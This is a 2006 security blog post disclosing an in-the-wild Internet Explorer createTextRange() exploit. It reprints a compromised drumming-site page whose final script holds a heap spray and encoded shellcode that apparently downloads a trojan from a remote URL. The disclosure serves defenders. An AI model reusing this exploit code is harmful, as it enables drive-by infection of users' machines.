Internet Explorer createTextRange() 0day ITW Exploit
March 26th, 2006 by SecuriTeam, Filed under: Microsoft, Virus, Web
over the past week an internet explorer 0day vulnerability has been exploited in the wild, openly targeting users. most of the exploits run shellcode which downloads a trojan horse to the exploited machine. the trojan horse downloaded varies from one exploiting site to another.
according to a chat i just had with dan hubbard from websense, more than 200 web sites hosted this code exploiting users so far. secunia issued an advisory on it.
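below is an example of the source of one of the web pages holding the exploit code. we strongly suggest you don’t run it. most of the page is an ordinary frontpage/word-generated site with a mouse-trail script; the exploit itself is the last script block, after the checkbox input with id “blah”, which builds large strings from unescape()'d shellcode and then calls createtextrange() on that checkbox. as reproduced here the markup appears to have been lowercased and its quotes converted to typographic ones, so treat it as a reading copy rather than a byte-exact sample.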
<!doctype html public “-//w3c//dtd html 4.0 transitional//en”>
<html xmlns=”http://www.w3.org/tr/rec-html40″ xmlns:o =
“urn:schemas-microsoft-com:office:office” xmlns:w =
“urn:schemas-microsoft-com:office:word” xmlns:v =
“urn:schemas-microsoft-com:vml”><head>
<meta http-equiv=content-type content=”text/html; charset=windows-1252″>
<meta content=frontpage.editor.document name=progid>
<meta content=”mshtml 6.00.2800.1226″ name=generator>
<meta content=”microsoft word 10″ name=originator><link
xhref=”introduction_files/filelist.xml” mce_href=”introduction_files/filelist.xml” rel=file-list><!–[if gte mso 9]><xml>
<o:documentproperties>
<o:author>denis le marchant-smith</o:author>
<o:template>normal</o:template>
<o:lastauthor>denis le marchant-smith</o:lastauthor>
<o:revision>2</o:revision>
<o:totaltime>1</o:totaltime>
<o:created>2003-04-19t12:24:00z</o:created>
<o:lastsaved>2003-04-19t12:24:00z</o:lastsaved>
<o:pages>1</o:pages>
<o:company>evr</o:company>
<o:lines>1</o:lines>
<o:paragraphs>1</o:paragraphs>
<o:version>10.2625</o:version>
</o:documentproperties>
</xml><![endif]–><!–[if gte mso 9]><xml>
<w:worddocument>
<w:compatibility>
<w:breakwrappedtables/>
<w:snaptogridincell/>
<w:wraptextwithpunct/>
<w:useasianbreakrules/>
</w:compatibility>
<w:browserlevel>microsoftinternetexplorer4</w:browserlevel>
</w:worddocument>
</xml><![endif]–>
<style>@page section1 {size: 8.5in 11.0in; margin: 1.0in 1.25in 1.0in 1.25in; mso-header-margin: .5in; mso-footer-margin: .5in; mso-paper-source: 0; }
p.msonormal {
font-size: 12pt; margin: 0in 0in 0pt; font-family: “times new roman”; mso-style-parent: “”; mso-pagination: widow-orphan; mso-fareast-font-family: “times new roman”
}
li.msonormal {
font-size: 12pt; margin: 0in 0in 0pt; font-family: “times new roman”; mso-style-parent: “”; mso-pagination: widow-orphan; mso-fareast-font-family: “times new roman”
}
div.msonormal {
font-size: 12pt; margin: 0in 0in 0pt; font-family: “times new roman”; mso-style-parent: “”; mso-pagination: widow-orphan; mso-fareast-font-family: “times new roman”
}
div.section1 {
page: section1
}
</style>
<!–[if gte mso 10]>
<style>
/* style definitions */
table.msonormaltable
{mso-style-name:”table normal”;
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-parent:”";
mso-padding-alt:0in 5.4pt 0in 5.4pt;
mso-para-margin:0in;
mso-para-margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:”times new roman”}
</style>
<![endif]–><!–[if !mso]>
<style>v\:* {
behavior: url(#default#vml)
}
o\:* {
behavior: url(#default#vml)
}
w\:* {
behavior: url(#default#vml)
}
.shape {
behavior: url(#default#vml)
}
</style>
<![endif]–><!–[if gte mso 9]>
<xml><o:shapedefaults v:ext=”edit” spidmax=”1027″/>
</xml><![endif]–></head>
<body lang=en-us style=”tab-interval: .5in” bgcolor=#000000 background=”background.gif”>
<div id=dot0
style=”visibility: hidden; width: 11px; position: absolute; height: 11px”><img
height=11 xsrc=”" mce_src=”" width=11> </div>
<div id=dot1 style=”width: 11px; position: absolute; height: 11px”><img
height=11 xsrc=”index_files/bullet.gif” mce_src=”index_files/bullet.gif” width=11> </div>
<div id=dot2 style=”width: 11px; position: absolute; height: 11px”><img
height=11 xsrc=”index_files/bullet.gif” mce_src=”index_files/bullet.gif” width=11> </div>
<div id=dot3 style=”width: 11px; position: absolute; height: 11px”><img
height=11 xsrc=”index_files/bullet.gif” mce_src=”index_files/bullet.gif” width=11> </div>
<div id=dot4 style=”width: 11px; position: absolute; height: 11px”><img
height=11 xsrc=”index_files/bullet.gif” mce_src=”index_files/bullet.gif” width=11> </div>
<div id=dot5 style=”width: 11px; position: absolute; height: 11px”><img
height=11 xsrc=”index_files/bullet.gif” mce_src=”index_files/bullet.gif” width=11> </div>
<div id=dot6 style=”width: 11px; position: absolute; height: 11px”><img
height=11 xsrc=”index_files/bullet.gif” mce_src=”index_files/bullet.gif” width=11> </div>
<script language=javascript>
<!– hide code/*
elastic trail script (by philip winston @ pwinston@yahoo.com, url: http://www.geocities.com/pwinston/)
script featured on dynamicdrive.com
for this and 100′s more dhtml scripts, visit http://dynamicdrive.com
*/var ndots = 7;
var xpos = 0;
var ypos = 0;// fixed time step, no relation to real time
var deltat = .01;
// size of one spring in pixels
var seglen = 10;
// spring constant, stiffness of springs
var springk = 10;
// all the physics is bogus, just picked stuff to
// make it look okay
var mass = 1;
// positive xgravity pulls right, negative pulls left
// positive ygravity pulls down, negative up
var xgravity = 0;
var ygravity = 50;
// resistance determines a slowing force proportional to velocity
var resistance = 10;
// stopping criterea to prevent endless jittering
// doesn’t work when sitting on bottom since floor
// doesn’t push back so acceleration always as big
// as gravity
var stopvel = 0.1;
var stopacc = 0.1;
var dotsize = 11;
// bounce is percent of velocity retained when
// bouncing off a wall
var bounce = 0.75;var isnetscape = navigator.appname==”netscape”;
// always on for now, could be played with to
// let dots fall to botton, get thrown, etc.
var followmouse = true;var dots = new array();
init();function init()
{
var i = 0;
for (i = 0; i < ndots; i++) {
dots[i] = new dot(i);
}if (!isnetscape) {
// i only know how to read the locations of the
// <li> items in ie
//skip this for now
// setinitpositions(dots)
}// set their positions
for (i = 0; i < ndots; i++) {
dots[i].obj.left = dots[i].x;
dots[i].obj.top = dots[i].y;
}if (isnetscape) {
// start right away since they are positioned
// at 0, 0
startanimate();
} else {
// let dots sit there for a few seconds
// since they’re hiding on the real bullets
settimeout(“startanimate()”, 1000);
}
}function dot(i)
{
this.x = xpos;
this.y = ypos;
this.dx = 0;
this.dy = 0;
if (isnetscape) {
this.obj = eval(“document.dot” + i);
} else {
this.obj = eval(“dot” + i + “.style”);
}
}function startanimate() {
setinterval(“animate()”, 20);
}// this is to line up the bullets with actual li tags on the page
// had to add -dotsize to x and 2*dotsize to y for ie 5, not sure why
// still doesn’t work great
function setinitpositions(dots)
{
// initialize dot positions to be on top
// of the bullets in the <ul>
var startloc = document.all.tags(“li”);
var i = 0;
for (i = 0; i < startloc.length && i < (ndots – 1); i++) {
dots[i+1].x = startloc[i].offsetleft
startloc[i].offsetparent.offsetleft – dotsize;
dots[i+1].y = startloc[i].offsettop +
startloc[i].offsetparent.offsettop + 2*dotsize;
}
// put 0th dot above 1st (it is hidden)
dots[0].x = dots[1].x;
dots[0].y = dots[1].y – seglen;
}// just save mouse position for animate() to use
function movehandler(e)
{
xpos = e.pagex;
ypos = e.pagey;
return true;
}// just save mouse position for animate() to use
function movehandlerie() {
xpos = window.event.x + document.body.scrollleft;
ypos = window.event.y + document.body.scrolltop;
}if (isnetscape) {
document.captureevents(event.mousemove);
document. = movehandler;
} else {
document. = movehandlerie;
}function vec(x, y)
{
this.x = x;
this.y = y;
}// adds force in x and y to spring for dot[i] on dot[j]
function springforce(i, j, spring)
{
var dx = (dots[i].x – dots[j].x);
var dy = (dots[i].y – dots[j].y);
var len = math.sqrt(dx*dx + dy*dy);
if (len > seglen) {
var springf = springk * (len – seglen);
spring.x += (dx / len) * springf;
spring.y += (dy / len) * springf;
}
}function animate() {
// dots[0] follows the mouse,
// though no dot is drawn there
var start = 0;
if (followmouse) {
dots[0].x = xpos;
dots[0].y = ypos;
start = 1;
}for (i = start ; i < ndots; i++ ) {
var spring = new vec(0, 0);
if (i > 0) {
springforce(i-1, i, spring);
}
if (i < (ndots – 1)) {
springforce(i+1, i, spring);
}// air resisitance/friction
var resist = new vec(-dots[i].dx * resistance,
-dots[i].dy * resistance);// compute new accel, including gravity
var accel = new vec((spring.x + resist.x)/mass + xgravity,
(spring.y + resist.y)/ mass + ygravity);// compute new velocity
dots[i].dx += (deltat * accel.x);
dots[i].dy += (deltat * accel.y);// stop dead so it doesn’t jitter when nearly still
if (math.abs(dots[i].dx) < stopvel &&
math.abs(dots[i].dy) < stopvel &&
math.abs(accel.x) < stopacc &&
math.abs(accel.y) < stopacc) {
dots[i].dx = 0;
dots[i].dy = 0;
}// move to new position
dots[i].x += dots[i].dx;
dots[i].y += dots[i].dy;// get size of window
var height, width;
if (isnetscape) {
height = window.innerheight + window.pageyoffset;
width = window.innerwidth + window.pagexoffset;
} else {
height = document.body.clientheight + document.body.scrolltop;
width = document.body.clientwidth + document.body.scrollleft;
}// bounce off 3 walls (leave ceiling open)
if (dots[i].y >= height – dotsize – 1) {
if (dots[i].dy > 0) {
dots[i].dy = bounce * -dots[i].dy;
}
dots[i].y = height – dotsize – 1;
}
if (dots[i].x >= width – dotsize) {
if (dots[i].dx > 0) {
dots[i].dx = bounce * -dots[i].dx;
}
dots[i].x = width – dotsize – 1;
}
if (dots[i].x < 0) {
if (dots[i].dx < 0) {
dots[i].dx = bounce * -dots[i].dx;
}
dots[i].x = 0;
}// move img to new position
dots[i].obj.left = dots[i].x;
dots[i].obj.top = dots[i].y;
}
}// end code hiding –>
</script><p align=center>â </p>
<p align=center>â </p>
<p align=center><font face=fifthave><!–[if gte vml 1]><v:shapetype
id=_x0000_t170 coordsize = “21600,21600″ o:spt = “170″ path =
” m@0,0 l@1,0 m0,21600 l21600,21600 e” adj = “7200″><v:formulas><v:f eqn =
“sum #0 0 0 “></v:f><v:f eqn = “sum 21600 0 @0 “></v:f><v:f eqn =
“prod #0 1 2 “></v:f><v:f eqn = “sum 21600 0 @2 “></v:f><v:f eqn =
“sum @1 21600 @0 “></v:f></v:formulas><v:path o:connectangles=”270,180,90,0″
o:connectlocs=”10800,0;@2,10800;10800,21600;@3,10800″ textpathok = “t”
o:connecttype = “custom”></v:path><v:textpath on = “t” fitshape =
“t”></v:textpath><v:handles><v:h xrange=”0,10792″
position=”#0,topleft”></v:h></v:handles><o:lock shapetype=”t” text=”t”
v:ext=”edit”></o:lock></v:shapetype><v:shape id=_x0000_s1028
style=”width: 300.75pt; height: 120.75pt” type = “#_x0000_t170″ coordsize =
“21600,21600″ alt = “rock drumming” fillcolor = “blue” strokecolor =
“red” strokeweight = “12668emu” adj = “2158″><v:shadow on = “t” type =
“perspective” color = “#875b0d” opacity = “45875f” matrix =
“,,,.5,0,-476837158203125e-21″ origin = “,.5″></v:shadow><v:textpath
style=”font-family: ‘arial black’; v-text-kern: t” fitpath = “t” trim = “t”
string = “rock drumming”></v:textpath></v:shape><![endif]–><![if !vml]><img border=0 width=397 height=165
xsrc=”introduction_files/image001.gif” mce_src=”introduction_files/image001.gif” alt=”rock drumming” v:shapes=”_x0000_s1028″><![endif]></font></p>
<p align=center>â </p>
<p align=center>â </p>
<p align=left>â </p>
<p align=left><font color=#ffffff size=6>hi, my name is alex, and i have been
playing the drums since i was four years old and i have made this website to
show you types and tips on rock drumming. so in this website you will find a lot
of things you need to know to become a rock drummer. so now you can
explore my out of this world site. you can go to different parts of my website
by clicking on the words below.</font></p>
<p align=center>â </p>
<p align=center>â </p>
<p align=center>â </p>
<p align=center><img height=379 xsrc=”indexfiles/duhh.gif” mce_src=”indexfiles/duhh.gif” width=278
border=0></p>
<p align=center>â </p>
<p align=center>â </p>
<p align=center><a
xhref=”tips.htm” mce_href=”tips.htm”><font
face=catchup color=#00ff00 size=7>tips</font></a></p>
<p align=center>â </p>
<p align=center><a
xhref=”tricks.htm” mce_href=”tricks.htm”><font
face=”copperplate gothic bold” color=#00ff00 size=7>types of
drums</font></a></p>
<p align=center>â </p>
<p align=center>
<font size=7><a
xhref=”drumsets.htm” mce_href=”drumsets.htm”><font
color=#00ff00>drum sets</font></a></font></font></p>
<p align=center>â </p>
<input type=”checkbox” id=”blah”>
<script language=”javascript”>shellcode = unescape( “%u4343%u4343%u1fe8%u0005%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 
%u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u6300%u6c61%u2e63%u7865%u0065%u6f4d%u697a %u6c6c%u2f61%u2e34%u2030%u6328%u6d6f%u6170 %u6974%u6c62%u3b65%u4d20%u4953%u2045%u2e35
%u3130%u203b%6957%u646e%u776f%u2073%u544e %u3520%u302e%u0029%u6977%u696e%u656e%u2e74 %u6c64%u006c%u0000%u0000%u0000%u0000%u0000 %u0000%u03e8%u0000%u6e49%u6574%u6e72%u7465 %u704f%u6e65%u0041%u6e49%u6574%u6e72%u7465 %u704f%u6e65%u7255%u416c%u4900%u746e%u7265 %u656e%u5274%u6165%u4664%u6c69%u0065%u6e49 %u6574%u6e72%u7465%u6c43%u736f%u4865%u6e61 %u6c64%u0065%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u7468%u7074%u2f3a%u772f%u7777 %u662e%u6c75%u666c%u7461%u6b73%u6e69%u796e %u632e%u6d6f%u632f%u2e61%u7865%u0065%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u0000%u0000%u0000%u0000%u0000 %u0000%u0000%u6058%ud08b%u33fc%u64c0%u408b %u8b30%u0c40%u708b%uad1c%u688b%u5208%u5252 %u5252%u5252%u5252%u5252%u5252%u79bb%ue741 %u5288%u0068%u0002%ue800%u0191%u0000%u8b5f %u03f7%u81f8%ue8c6%u0003%ub900%u0009%u0000 %ua4f2%ubb5a%u7959%u4773%u006a%u8068%u0000 %u6a00%u6a02%u6a00%u6800%u0000%u4000%ue852 %u0161%u0000%ue85a%u014b%u0000%u4289%u8304 %u0cea%u71bb%ue8a7%u52fe%u4ae8%u0001%ubb00 %uc21b%u3b10%ue85a%u012f%u0000%u0289%uc283 %u5210%ue850%u0133%u0000%u815a%ue8c2%u0003 %u8300%u09c2%u006a%u006a%u006a%u006a%uff52 %u5ad0%u08e8%u0001%u8900%u0842%u028b%u1bbb %u10c2%u833b%u1ec2%u5052%u04e8%u0001%u5a00 %ueee8%u0000%u8b00%u8bd8%u0842%uc281%u00a8 %u0000%u006a%u0068%u0000%u6a80%u6a00%u5200 %uff50%u5ad3%ucee8%u0000%u8900%u0842%u028b %u1bbb%u10c2%u833b%u2fc2%u5052%ucae8%u0000 %u8b00%u5af0%ub2e8%u0000%u8b00%u087a%uca8b %uc183%u5a0c%u5256%u5151%ue868%u0003%u5200 %uff57%u59d6%uc00b%u0774%u3983%u7500%ueb02 %u5a2a%u5251%ue852%u0087%u0000%uda8b%uc383 %u5e0c%u006a%u8b53%u0442%u4a8b%u510c%u5056 %u4fbb%u6a47%ue807%u007b%u0000%u595a%ueb5e %u5abd%ue85e%u005f%u0000%u428b%ubb04%uc776 %ued00%ue850%u0061%u0000%ubb5a%u4179%u88e7 %u6852%u0200%u0000%u50e8%u0000%u5f00%uf78b 
%uf803%uc681%u03e8%u0000%u09b9%u0000%uf200 %u5aa4%uc033%uf28b%uc681%u0491%u0000%ufe8b %uc783%uc710%u1047%u0044%u0000%u21bb%u05d0 %u57d0%u5056%u6a50%u5020%u5050%u5250%u12e8 %u0000%u6100%u81c3%ue8c2%u0003%u8300%u09c2 %uc283%u8334%u0cc2%u53c3%u5756%u458b%u8b3c %u0554%u0378%u52d5%u528b%u0320%u33d5%u33c0 %u41c9%u348b%u038a%u33f5%uc1ff%u13cf%u03ac%u85f8 %u75c0%u3bf6%u75fb%u5aea%u5a8b%u0324%u66dd %u0c8b%u8b4b%u1c5a%udd03%u048b%u038b%u5fc5 %u5b5e%ue0ff”);bigblock = unescape(“%u9090%u9090″);
slackspace = 20 + shellcode.lengthwhile (bigblock.length < slackspace)
bigblock += bigblock;fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length + slackspace < 0×40000)
block = block + block + fillblock;memory = new array();
for ( i = 0; i < 2020; i++ )
memory[i] = block + shellcode;var r = document.getelementbyid(‘blah’).createtextrange();
</script>
</body></html>
gadi evron,
ge@beyondsecurity.com.



